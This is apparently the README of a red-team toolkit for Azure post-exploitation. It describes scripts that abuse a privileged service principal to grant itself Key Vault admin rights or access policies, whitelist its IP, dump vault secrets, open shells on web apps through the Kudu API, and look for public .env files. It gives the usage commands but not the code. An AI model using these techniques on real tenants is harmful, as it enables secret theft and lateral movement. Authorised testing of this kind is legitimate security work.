Post Exploitation Collection Tools for Enumeration and abuse Azure WebApp and Azure Key Vaults recources
These tools developed for help IT Administrators (not not realy..)... These tools are developed for Red Teamers, whos secceded to find a high privileged Service Prinicpal with high permissions on ARM API.
you can use it:
- for data exflitration with Vaulter.ps1
- for lateral movment with WebApp-Shell.ps1
- for enumeration on WebApps with WebAppEnum.ps1
This tool is checking if the key vault is manged by RBAC or by Access Policy, and abuse yout Ideneity's pemissions for :
- Adding "Key Vault Administrator" role (RBAC), and adding your IP Addres to NetWork Rule.
- Adding your Object ID (of your Identity) (Access Policy), and adding your IP Addres to NetWork Rule.
Import-Module Vaulter.ps1VaulterA file called 'kv_results.ndjson' will created, and all the data will be there In the end of running, use Report-Builder.ps1 for create a beautiful report for you data baby
Import-Module Report-Builder.ps1Report-Builder -InputFile .\kv_results.ndjsonEnumerating all WebApp and trying to create an interactive shell (by using KUDU/SCM api/command API)
Import-Module WebApp-Shell.ps1WebApp-ShellEnumerating all WebApp, and check if "/.env" file is exsit with public access and more fuzzing stafffff
Import-Module WebAppEnum.ps1WebAppEnumYou can use "-check' argument for full enumeration
WebAppEnum -CheckEnter Service Principal Credentials:
